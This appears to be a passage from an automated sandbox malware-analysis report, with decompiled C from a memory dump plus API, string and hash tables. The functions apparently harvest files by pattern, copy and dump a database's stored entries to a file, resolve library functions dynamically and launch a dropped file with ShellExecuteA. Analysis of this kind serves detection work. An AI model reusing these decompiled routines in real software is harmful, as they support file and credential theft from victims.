				char* _v864;
				intOrPtr* _v868;
				char* _v872;
				char _v873;
				char _v874;
				char* _v880;
				char* _v884;
				signed int _t76;
				intOrPtr _t80;
				intOrPtr _t82;
				void* _t87;
				int _t91;
				char* _t94;
				char* _t95;
				signed int _t108;
				char _t111;
				char _t112;
				char _t113;
				char _t114;
				signed int _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t141;

				_t133 = __esi;
				_t132 = __edi;
				_t115 = __edx;
				_t100 = __ebx;
				_t76 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t76 ^ _t134;
				SetCurrentDirectoryA(_a12);
				_t101 = _a12;
				_t80 = E0041FB40(__ebx, _t115, __edi, __esi, _a12);
				_t136 = _t135 + 4;
				_v284 = _t80;
				if(_v284 == 0) {
					L28:
					__eflags = _v12 ^ _t134;
					return E00404354(_t80, _t100, _v12 ^ _t134, _t115, _t132, _t133);
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t82 = E0041FB20(_t101, _v284);
					_t137 = _t136 + 4;
					_v8 = _t82;
					if(_v8 == 0) {
						break;
					}
					E004091C0( &_v844, 0, 0x104);
					wsprintfA( &_v844, "%s\\%s", _a12, _v8 + 0x14);
					_t87 = E004052FA(_t133, _a8, 0x4294cd);
					_t141 = _t137 + 0x24;
					if(_t87 != 0) {
						_t108 = _v8 + 0x14;
						__eflags = _t108;
						wsprintfA( &_v276, "%s\\%s", _a8, _t108);
						_t136 = _t141 + 0x10;
					} else {
						wsprintfA( &_v276, "%s", _v8 + 0x14);
						_t136 = _t141 + 0xc;
					}
					if( *((intOrPtr*)(_v8 + 0x10)) != 0x4000) {
						_t101 = _v8 + 0x14;
						_t91 = PathMatchSpecA(_v8 + 0x14, _a16);
						__eflags = _t91;
						if(_t91 != 0) {
							_t101 = _a4;
							E00419580(_a4,  &_v276,  &_v844);
							_t136 = _t136 + 0xc;
						}
						goto L26;
					} else {
						_v848 = ".";
						_v852 = _v8 + 0x14;
						while(1) {
							_t94 = _v852;
							_t111 =  *_t94;
							_v853 = _t111;
							if(_t111 !=  *_v848) {
								break;
							}
							if(_v853 == 0) {
								L11:
								_v860 = 0;
								L13:
								_t101 = _v860;
								_v864 = _v860;
								if(_v864 == 0) {
									L22:
									goto L1;
								}
								_v868 = "..";
								_v872 = _v8 + 0x14;
								while(1) {
									_t95 = _v872;
									_t112 =  *_t95;
									_v873 = _t112;
									if(_t112 !=  *_v868) {
										break;
									}
									if(_v873 == 0) {
										L19:
										_v880 = 0;
										L21:
										_t101 = _v880;
										_v884 = _v880;
										if(_v884 != 0) {
											_t101 =  &_v276;
											E004202A0(_t100, _a4, _t132, _t133, __eflags, _a4,  &_v276,  &_v844, _a16);
											_t136 = _t136 + 0x10;
											L26:
											goto L1;
										}
										goto L22;
									}
									_t95 = _v872;
									_t113 = _t95[1];
									_v874 = _t113;
									_t54 = _v868 + 1; // 0x2c00002e
									if(_t113 !=  *_t54) {
										break;
									}
									_v872 =  &(_v872[2]);
									_v868 = _v868 + 2;
									if(_v874 != 0) {
										continue;
									}
									goto L19;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								_v880 = _t95;
								goto L21;
							}
							_t94 = _v852;
							_t114 = _t94[1];
							_v854 = _t114;
							_t32 =  &(_v848[1]); // 0x2e000000
							if(_t114 !=  *_t32) {
								break;
							}
							_v852 =  &(_v852[2]);
							_v848 =  &(_v848[2]);
							if(_v854 != 0) {
								continue;
							}
							goto L11;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v860 = _t94;
						goto L13;
					}
				}
				_t115 = _v284;
				_t80 = E0041F970(_t101, _v284);
				goto L28;
			}

0x004202a0
0x004202a0
0x004202a0
0x004202a0
0x004202a9
0x004202b0
0x004202b7
0x004202bd
0x004202c1
0x004202c6
0x004202c9
0x004202d6
0x00420525
0x00420528
0x00420532
0x00000000
0x00000000
0x00000000
0x004202dc
0x004202dc
0x004202e3
0x004202e8
0x004202eb
0x004202f2
0x00000000
0x00000000
0x00420306
0x00420325
0x00420337
0x0042033c
0x00420341
0x00420364
0x00420364
0x00420378
0x0042037e
0x00420343
0x00420356
0x0042035c
0x0042035c
0x0042038b
0x004204e9
0x004204ed
0x004204f3
0x004204f5
0x00420505
0x00420509
0x0042050e
0x0042050e
0x00000000
0x00420391
0x00420391
0x004203a1
0x004203a7
0x004203a7
0x004203ad
0x004203af
0x004203bd
0x00000000
0x00000000
0x004203c6
0x004203f9
0x004203f9
0x00420410
0x00420410
0x00420416
0x00420423
0x004204bd
0x00000000
0x004204bd
0x00420429
0x00420439
0x0042043f
0x0042043f
0x00420445
0x00420447
0x00420455
0x00000000
0x00000000
0x0042045e
0x00420491
0x00420491
0x004204a8
0x004204a8
0x004204ae
0x004204bb
0x004204cd
0x004204d8
0x004204dd
0x00420511
0x00000000
0x00420511
0x00000000
0x004204bb
0x00420460
0x00420466
0x00420469
0x00420475
0x00420478
0x00000000
0x00000000
0x0042047a
0x00420481
0x0042048f
0x00000000
0x00000000
0x00000000
0x0042048f
0x0042049d
0x0042049f
0x004204a2
0x00000000
0x004204a2
0x004203c8
0x004203ce
0x004203d1
0x004203dd
0x004203e0
0x00000000
0x00000000
0x004203e2
0x004203e9
0x004203f7
0x00000000
0x00000000
0x00000000
0x004203f7
0x00420405
0x00420407
0x0042040a
0x00000000
0x0042040a
0x0042038b
0x00420516
0x0042051d
0x00000000

APIs

SetCurrentDirectoryA.KERNEL32(?), ref: 004202B7
_memset.LIBCMT ref: 00420306
wsprintfA.USER32 ref: 00420325
wsprintfA.USER32 ref: 00420356
wsprintfA.USER32 ref: 00420378
PathMatchSpecA.SHLWAPI(-00000014,?), ref: 004204ED

Strings

%s\%s, xrefs: 0042036C
%s\%s, xrefs: 00420319

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf$CurrentDirectoryMatchPathSpec_memset
String ID: %s\%s$%s\%s
API String ID: 512208171-3515709335
Opcode ID: 141f0e15cebe44d10cad8ad4f2c8c8da476f08cf655785c2c70918d9b4770972
Instruction ID: ae06e90ec2fe91b52258a92f08eb3126106a9cd97fdc9158904f1280b265a2f4
Opcode Fuzzy Hash: 141f0e15cebe44d10cad8ad4f2c8c8da476f08cf655785c2c70918d9b4770972
Instruction Fuzzy Hash: F1718DB0E00268ABCB26DF24EC45BEEB7B9AF44304F5481DAE51967282D7349F84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004217A0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79
networkCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004217A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				intOrPtr _v52;
				signed int _t26;
				long _t30;
				long _t35;
				long _t39;
				long _t43;
				void* _t47;
				signed int _t72;

				_push(0xffffffff);
				_push(E004264E5);
				_push( *[fs:0x0]);
				_t26 =  *0x4301f4; // 0x3b2bc12f
				_t27 = _t26 ^ _t72;
				_v20 = _t26 ^ _t72;
				 *[fs:0x0] =  &_v16;
				_v52 = __ecx;
				E004011C0( &_v48, "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1");
				_v8 = 0;
				_t30 = E00401350( &_v48);
				HttpAddRequestHeadersA(_a4, E00401330( &_v48), _t30, 0x20000000);
				E00401EA0( &_v48, "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8");
				_t35 = E00401350( &_v48);
				HttpAddRequestHeadersA(_a4, E00401330( &_v48), _t35, 0x20000000);
				E00401EA0( &_v48, "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1");
				_t39 = E00401350( &_v48);
				HttpAddRequestHeadersA(_a4, E00401330( &_v48), _t39, 0x20000000);
				E00401EA0( &_v48, "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0");
				_t43 = E00401350( &_v48);
				HttpAddRequestHeadersA(_a4, E00401330( &_v48), _t43, 0x20000000);
				_v8 = 0xffffffff;
				_t47 = E004012D0( &_v48);
				 *[fs:0x0] = _v16;
				return E00404354(_t47, __ebx, _v20 ^ _t72, _a4, __edi, __esi, _t27);
			}

0x004217a3
0x004217a5
0x004217b0
0x004217b4
0x004217b9
0x004217bb
0x004217c2
0x004217c8
0x004217d3
0x004217d8
0x004217e7
0x004217fa
0x00421808
0x00421815
0x00421828
0x00421836
0x00421843
0x00421856
0x00421864
0x00421871
0x00421884
0x0042188a
0x00421894
0x0042189c
0x004218b1

APIs

HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 004217FA
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421828
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421856
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421884

Strings

Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 0042185C
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 004217CB
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00421800
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0042182E

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HeadersHttpRequest
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
API String ID: 1754618566-787135837
Opcode ID: c6616a4315f7d14bb24da780d0fbaf2e7fb53b63766f8890632f5e6fc0cc789f
Instruction ID: 951c1c069f48a410e88b64a83560fd4940259fb5ddc57e6de6dc9285112dc84f
Opcode Fuzzy Hash: c6616a4315f7d14bb24da780d0fbaf2e7fb53b63766f8890632f5e6fc0cc789f
Instruction Fuzzy Hash: 4831F076900108ABDB08EFA5DD51FDEB778AB18744F50812AF512B25E1DF786508CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004207B0, Relevance: 12.2, APIs: 8, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004207B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v548;
				intOrPtr* _v552;
				char* _v556;
				intOrPtr _v560;
				char _v561;
				intOrPtr* _v568;
				char* _v572;
				intOrPtr _v576;
				char _v577;
				intOrPtr* _v584;
				char* _v588;
				intOrPtr _v592;
				char _v593;
				void* __ebp;
				signed int _t64;
				CHAR* _t69;
				intOrPtr _t72;
				void* _t73;
				intOrPtr* _t74;
				void* _t79;
				intOrPtr _t80;
				intOrPtr* _t81;
				void* _t86;
				intOrPtr* _t88;
				intOrPtr _t92;
				void* _t94;
				intOrPtr _t98;
				intOrPtr _t102;
				intOrPtr _t110;
				intOrPtr _t124;
				intOrPtr _t129;
				signed int _t137;
				void* _t138;
				void* _t144;
				void* _t146;
				void* _t148;
				void* _t149;

				_t136 = __esi;
				_t135 = __edi;
				_t99 = __ebx;
				_t64 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t64 ^ _t137;
				E004091C0( &_v540, 0, 0x104);
				E004091C0( &_v276, 0, 0x104);
				_t69 =  *0x4326f4; // 0xc115e8
				wsprintfA( &_v540, _t69, _a4);
				_v8 = E00416CE0( &_v540, 0);
				_t72 =  *0x43224c; // 0xc10500
				_push(_t72);
				_t73 = E00405DBC(__ebx, __edi, __esi, _t64 ^ _t137);
				_t102 =  *0x43224c; // 0xc10500
				_t74 = E0041A890(_a8, _t102, _t73);
				_t144 = _t138 + 0x3c;
				_v552 = _t74;
				_v556 =  &_v276;
				_v560 = _v556;
				do {
					_v561 =  *_v552;
					 *_v556 = _v561;
					_v552 = _v552 + 1;
					_v556 = _v556 + 1;
					_t153 = _v561;
				} while (_v561 != 0);
				_t124 =  *0x4321c4; // 0xc159b8
				_push(_t124);
				_t79 = E00405DBC(__ebx, __edi, __esi, _t153);
				_t80 =  *0x4321c4; // 0xc159b8
				_t81 = E0041A890( &_v276, _t80, _t79);
				_t146 = _t144 + 0x10;
				_v568 = _t81;
				_v572 =  &_v276;
				_v576 = _v572;
				do {
					_v577 =  *_v568;
					 *_v572 = _v577;
					_v568 = _v568 + 1;
					_v572 = _v572 + 1;
					_t154 = _v577;
				} while (_v577 != 0);
				_t110 =  *0x4324ec; // 0xc158f8
				_push(_t110);
				_t86 = E00405DBC(__ebx, __edi, __esi, _t154);
				_t129 =  *0x4324ec; // 0xc158f8
				_t88 = E0041A890( &_v276, _t129, _t86);
				_t148 = _t146 + 0x10;
				_v584 = _t88;
				_v588 =  &_v276;
				_v592 = _v588;
				do {
					_v593 =  *_v584;
					 *_v588 = _v593;
					_v584 = _v584 + 1;
					_t133 = _v588 + 1;
					_v588 = _v588 + 1;
				} while (_v593 != 0);
				_t92 = E0040540F(__ebx, _t133, __edi, _a12, ",",  &_v548);
				_t149 = _t148 + 0xc;
				_v544 = _t92;
				while(1) {
					_t156 = _v544;
					if(_v544 == 0) {
						break;
					}
					E004202A0(_t99, _v544, _t135, _t136, _t156, _v8, 0x4294ce,  &_v276, _v544);
					_t133 =  &_v548;
					_t98 = E0040540F(_t99,  &_v548, _t135, 0, ",",  &_v548);
					_t149 = _t149 + 0x1c;
					_v544 = _t98;
				}
				_t94 = E00417A10(_v8);
				__eflags = _v12 ^ _t137;
				return E00404354(_t94, _t99, _v12 ^ _t137, _t133, _t135, _t136);
			}

0x004207b0
0x004207b0
0x004207b0
0x004207b9
0x004207c0
0x004207d1
0x004207e7
0x004207f3
0x00420800
0x0042081a
0x0042081d
0x00420822
0x00420823
0x0042082c
0x00420837
0x0042083c
0x0042083f
0x0042084b
0x00420857
0x0042085d
0x00420865
0x00420877
0x00420882
0x00420891
0x00420897
0x00420897
0x004208a0
0x004208a6
0x004208a7
0x004208b0
0x004208bd
0x004208c2
0x004208c5
0x004208d1
0x004208dd
0x004208e3
0x004208eb
0x004208fd
0x00420908
0x00420917
0x0042091d
0x0042091d
0x00420926
0x0042092c
0x0042092d
0x00420936
0x00420944
0x00420949
0x0042094c
0x00420958
0x00420964
0x0042096a
0x00420972
0x00420984
0x0042098f
0x0042099b
0x0042099e
0x004209a4
0x004209bd
0x004209c2
0x004209c5
0x004209cb
0x004209cb
0x004209d2
0x00000000
0x00000000
0x004209eb
0x004209f3
0x00420a01
0x00420a06
0x00420a09
0x00420a09
0x00420a15
0x00420a20
0x00420a2a

APIs

_memset.LIBCMT ref: 004207D1
_memset.LIBCMT ref: 004207E7
wsprintfA.USER32 ref: 00420800
__wgetenv.LIBCMT ref: 00420823
__wgetenv.LIBCMT ref: 004208A7
__wgetenv.LIBCMT ref: 0042092D
_strtok_s.LIBCMT ref: 004209BD
_strtok_s.LIBCMT ref: 00420A01

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wgetenv$_memset_strtok_s$wsprintf
String ID:
API String ID: 1594673334-0
Opcode ID: e02be8a06755b44e2c9d88bf1494623bc16e3b012c7e6589cba44444dd2a2790
Instruction ID: d088c8966d5c9ab565de684a1559397d5dd8539fb1def0dbb97cd76fea656f82
Opcode Fuzzy Hash: e02be8a06755b44e2c9d88bf1494623bc16e3b012c7e6589cba44444dd2a2790
Instruction Fuzzy Hash: BE616AB5D01228ABCB25DB64EC89BDAB7B4AF58304F0441EAE50DA7352E6349FC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041B950, Relevance: 12.1, APIs: 8, Instructions: 123
filestringCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E0041B950(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __ebp;
				signed int _t33;
				void* _t45;
				int _t46;
				void* _t49;
				intOrPtr _t53;
				void* _t55;
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				CHAR* _t78;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				signed int _t88;
				void* _t89;
				void* _t92;
				void* _t93;
				void* _t96;

				_t87 = __esi;
				_t86 = __edi;
				_t63 = __ebx;
				_t33 =  *0x4301f4; // 0x3b2bc12f
				_v20 = _t33 ^ _t88;
				GetCurrentDirectoryA(0x104,  &_v548);
				_t64 =  *0x432400; // 0xc16718
				 *0x4328c4( &_v548, _t64);
				CopyFileA(_a4,  &_v548, 1);
				E004091C0( &_v284, 0, 0x104);
				_t78 =  *0x4321a8; // 0xc16410
				wsprintfA( &_v284, _t78, _a12, _a8);
				_t67 =  *0x432390; // 0xc16dd0
				_v12 = _t67;
				_t45 =  *0x432750( &_v548,  &_v8);
				_t92 = _t89 + 0x24;
				if(_t45 == 0) {
					_t49 =  *0x432700(_v8, _v12, 0xffffffff,  &_v16, 0);
					_t93 = _t92 + 0x14;
					if(_t49 == 0) {
						_t72 =  *0x4321d0; // 0xc110d8
						_t53 = E004055AB( &_v284, _t72);
						_t93 = _t93 + 8;
						_v552 = _t53;
						if(_v552 != 0) {
							while(1) {
								_t55 =  *0x432720(_v16);
								_t96 = _t93 + 4;
								_t103 = _t55 - 0x64;
								if(_t55 != 0x64) {
									break;
								}
								_v560 =  *0x43273c(_v16, 0);
								_v556 =  *0x43273c(_v16, 1);
								_push(_v556);
								_push(_v560);
								_t85 =  *0x4324f8; // 0xc16838
								_push(_t85);
								_push(_v552);
								E004055C2(_t63, _t86, _t87, _t103);
								_push("\n");
								_push(_v552);
								E004055C2(_t63, _t86, _t87, _t103);
								_t93 = _t96 + 0x28;
							}
							_push(_v552);
							E00405EA3(_t63, _v552, _t86, _t87, __eflags);
							_t93 = _t96 + 4;
						}
					}
					 *0x432724(_v16);
					 *0x432754(_v8);
				}
				_t46 = DeleteFileA( &_v548);
				__eflags = _v20 ^ _t88;
				return E00404354(_t46, _t63, _v20 ^ _t88,  &_v548, _t86, _t87);
			}

0x0041b950
0x0041b950
0x0041b950
0x0041b959
0x0041b960
0x0041b96f
0x0041b975
0x0041b983
0x0041b996
0x0041b9aa
0x0041b9ba
0x0041b9c8
0x0041b9d1
0x0041b9d7
0x0041b9e5
0x0041b9eb
0x0041b9f0
0x0041ba06
0x0041ba0c
0x0041ba11
0x0041ba17
0x0041ba25
0x0041ba2a
0x0041ba2d
0x0041ba3a
0x0041ba40
0x0041ba44
0x0041ba4a
0x0041ba4d
0x0041ba50
0x00000000
0x00000000
0x0041ba61
0x0041ba76
0x0041ba82
0x0041ba89
0x0041ba8a
0x0041ba90
0x0041ba97
0x0041ba98
0x0041baa0
0x0041baab
0x0041baac
0x0041bab1
0x0041bab1
0x0041babc
0x0041babd
0x0041bac2
0x0041bac2
0x0041ba3a
0x0041bac9
0x0041bad6
0x0041badc
0x0041bae6
0x0041baef
0x0041baf9

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041B96F
lstrcat.KERNEL32(?,00C16718), ref: 0041B983
CopyFileA.KERNEL32(?,?,00000001), ref: 0041B996
_memset.LIBCMT ref: 0041B9AA
wsprintfA.USER32 ref: 0041B9C8
DeleteFileA.KERNEL32(?), ref: 0041BAE6

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

_fprintf.LIBCMT ref: 0041BA98
_fprintf.LIBCMT ref: 0041BAAC

Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcatwsprintf
String ID:
API String ID: 556801341-0
Opcode ID: bdc4529dd0482d2979656e09d1c06ee7b728cc4a7c1283aba2730c499506d48a
Instruction ID: 1c0e87cc592032f7df9487bb38b6a08066b546de9b6ee00438106ce6f7326440
Opcode Fuzzy Hash: bdc4529dd0482d2979656e09d1c06ee7b728cc4a7c1283aba2730c499506d48a
Instruction Fuzzy Hash: D84171B1900208BBCB14DFA4ED89EEE73B8FF48304F0445A9F60997241D774AA84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041C690, Relevance: 12.1, APIs: 8, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041C690(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebp;
				intOrPtr _t15;
				struct HINSTANCE__* _t19;
				CHAR* _t22;
				struct HINSTANCE__* _t24;
				CHAR* _t27;
				CHAR* _t36;
				CHAR* _t37;
				struct HINSTANCE__* _t38;
				CHAR* _t39;
				struct HINSTANCE__* _t40;
				intOrPtr _t42;
				CHAR* _t43;
				struct HINSTANCE__* _t44;
				CHAR* _t45;
				struct HINSTANCE__* _t46;

				_t57 = _a4;
				if(_a4 == 0) {
					__eflags = 0;
					return 0;
				}
				_t15 =  *0x4320d4; // 0xc10590
				_push(_t15);
				_v8 = E00405DBC(__ebx, __edi, __esi, _t57);
				_t58 = _v8;
				if(_v8 != 0) {
					_push(0);
					_push(_a4);
					_v12 = E0041A3B0(_v8, ";");
					_push(0);
					_t42 =  *0x432690; // 0xc16708
					_push(E0041A3B0(_t42, _v12));
					E00406934(__ebx, _v8, __edi, __esi, _t58);
					_v16 = _v12;
					_push(_v16);
					E00405122();
				}
				_t36 =  *0x432440; // 0xc115c0
				 *0x432744 = LoadLibraryA(_t36);
				if( *0x432744 != 0) {
					_t43 =  *0x4322b8; // 0xc159e8
					_t19 =  *0x432744; // 0x0
					 *0x432738 = GetProcAddress(_t19, _t43);
					_t37 =  *0x4325a8; // 0xc159d0
					_t44 =  *0x432744; // 0x0
					 *0x432764 = GetProcAddress(_t44, _t37);
					_t22 =  *0x4321e4; // 0xc165d0
					_t38 =  *0x432744; // 0x0
					 *0x432708 = GetProcAddress(_t38, _t22);
					_t45 =  *0x432178; // 0xc15970
					_t24 =  *0x432744; // 0x0
					 *0x432730 = GetProcAddress(_t24, _t45);
					_t39 =  *0x4326d4; // 0xc162f0
					_t46 =  *0x432744; // 0x0
					 *0x432748 = GetProcAddress(_t46, _t39);
					_t27 =  *0x432338; // 0xc15988
					_t40 =  *0x432744; // 0x0
					 *0x432728 = GetProcAddress(_t40, _t27);
				}
				if( *0x432738 == 0 ||  *0x432764 == 0 ||  *0x432708 == 0 ||  *0x432748 == 0 ||  *0x432728 == 0 ||  *0x432730 == 0) {
					_v20 = 0;
				} else {
					_v20 = 1;
				}
				return _v20;
			}

0x0041c696
0x0041c69a
0x0041c7fd
0x00000000
0x0041c7fd
0x0041c6a0
0x0041c6a5
0x0041c6ae
0x0041c6b1
0x0041c6b5
0x0041c6b7
0x0041c6bc
0x0041c6ce
0x0041c6d1
0x0041c6d7
0x0041c6e6
0x0041c6e7
0x0041c6f2
0x0041c6f8
0x0041c6f9
0x0041c6fe
0x0041c701
0x0041c70e
0x0041c71a
0x0041c720
0x0041c727
0x0041c733
0x0041c738
0x0041c73f
0x0041c74c
0x0041c751
0x0041c757
0x0041c764
0x0041c769
0x0041c770
0x0041c77c
0x0041c781
0x0041c788
0x0041c795
0x0041c79a
0x0041c7a0
0x0041c7ad
0x0041c7ad
0x0041c7b9
0x0041c7f1
0x0041c7e8
0x0041c7e8
0x0041c7e8
0x00000000

APIs

__wgetenv.LIBCMT ref: 0041C6A6
LoadLibraryA.KERNEL32(00C115C0), ref: 0041C708
GetProcAddress.KERNEL32(00000000,00C159E8), ref: 0041C72D
GetProcAddress.KERNEL32(00000000,00C159D0), ref: 0041C746
GetProcAddress.KERNEL32(00000000,00C165D0), ref: 0041C75E
GetProcAddress.KERNEL32(00000000,00C15970), ref: 0041C776
GetProcAddress.KERNEL32(00000000,00C162F0), ref: 0041C78F
GetProcAddress.KERNEL32(00000000,00C15988), ref: 0041C7A7

Part of subcall function 00406934: __lock.LIBCMT ref: 00406942
Part of subcall function 00406934: __putenv_helper.LIBCMT ref: 00406951

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad__lock__putenv_helper__wgetenv
String ID:
API String ID: 1998870925-0
Opcode ID: e60d7f6d591f16d836343e78857c423cf86c8eb39a3fc1f5e49d3807ea21be5b
Instruction ID: bc76bed66b964f22f7e203c34eb3bfa844ac2a0ec1f30f63f8b8ac396b1e127b
Opcode Fuzzy Hash: e60d7f6d591f16d836343e78857c423cf86c8eb39a3fc1f5e49d3807ea21be5b
Instruction Fuzzy Hash: 844108B5900204EBD718DFA8FE98B9A77F4F708304F20A53AE515932A0D7F89984CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420130, Relevance: 12.1, APIs: 8, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00420130(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v288;
				char _v616;
				char _v880;
				signed int _t24;
				signed int _t25;
				void* _t37;
				void* _t38;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				signed int _t68;
				void* _t75;

				_t75 = __eflags;
				_t67 = __esi;
				_t66 = __edi;
				_t48 = __ebx;
				_t24 =  *0x4301f4; // 0x3b2bc12f
				_t25 = _t24 ^ _t68;
				_v20 = _t25;
				 *[fs:0x0] =  &_v16;
				E00421620( &_v616, __edi, __esi, 0x429493, 0xfde9, 0, 0, 0);
				_v8 = 0;
				E004091C0( &_v880, 0, 0x104);
				E004091C0( &_v288, 0, 0x104);
				_t62 =  *0x432570; // 0xc114b0
				 *0x4328c4( &_v880, _t62, _t25,  *[fs:0x0], E0042670A, 0xffffffff);
				 *0x4328c4( &_v880, E0041A580(_t62, __edi, __esi, _t75, 0xc));
				_t63 =  *0x432404; // 0xc114d8
				 *0x4328c4( &_v880, _t63);
				_t37 = E004228E0(__ebx,  &_v616, __edi, __esi, _a4);
				_t76 = _t37;
				if(_t37 != 0) {
					E00421440( &_v616,  &_v880);
					 *0x4328c4( &_v288,  &_v880);
					_t65 =  *0x432254; // 0xc114e8
					 *0x4328c4( &_v288, _t65);
					_t61 =  *0x4326b8; // 0xc11510
					_t63 =  &_v288;
					E0041A200(__ebx, _t61, _t66, _t67, _t76,  &_v288, _t61);
					ShellExecuteA(0, 0,  &_v880, 0x42949a, 0, 0);
				}
				_v8 = 0xffffffff;
				_t38 = E004215C0( &_v616);
				 *[fs:0x0] = _v16;
				return E00404354(_t38, _t48, _v20 ^ _t68, _t63, _t66, _t67);
			}

0x00420130
0x00420130
0x00420130
0x00420130
0x00420147
0x0042014c
0x0042014e
0x00420155
0x00420171
0x00420176
0x0042018b
0x004201a1
0x004201a9
0x004201b7
0x004201cf
0x004201d5
0x004201e3
0x004201f3
0x004201f8
0x004201fa
0x00420209
0x0042021c
0x00420222
0x00420230
0x00420236
0x0042023d
0x00420244
0x00420260
0x00420260
0x00420266
0x00420273
0x0042027b
0x00420290

APIs

Part of subcall function 00421620: _memset.LIBCMT ref: 00421634
Part of subcall function 00421620: _strcpy_s.LIBCMT ref: 00421653
Part of subcall function 00421620: _memset.LIBCMT ref: 0042168E

_memset.LIBCMT ref: 0042018B
_memset.LIBCMT ref: 004201A1
lstrcat.KERNEL32(00000000,00C114B0), ref: 004201B7

Part of subcall function 0041A580: _malloc.LIBCMT ref: 0041A58A
Part of subcall function 0041A580: GetTickCount.KERNEL32 ref: 0041A59B
Part of subcall function 0041A580: _rand.LIBCMT ref: 0041A5C4
Part of subcall function 0041A580: wsprintfA.USER32 ref: 0041A5E0

lstrcat.KERNEL32(00000000,00000000), ref: 004201CF
lstrcat.KERNEL32(00000000,00C114D8), ref: 004201E3
lstrcat.KERNEL32(?,00000000), ref: 0042021C
lstrcat.KERNEL32(?,00C114E8), ref: 00420230

Part of subcall function 0041A200: _fprintf.LIBCMT ref: 0041A221

ShellExecuteA.SHELL32(00000000,00000000,00000000,0042949A,00000000,00000000), ref: 00420260

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$CountExecuteShellTick_fprintf_malloc_rand_strcpy_swsprintf
String ID:
API String ID: 1303573618-0
Opcode ID: 4fa4fbf4923644e05247681e06b819e42152c1fdb312beb334c5ad132b7c9d23
Instruction ID: 1eb8018900904a953f08b4ff037de75d929d5fbdf90869bddc2b7de24f6974f4
Opcode Fuzzy Hash: 4fa4fbf4923644e05247681e06b819e42152c1fdb312beb334c5ad132b7c9d23
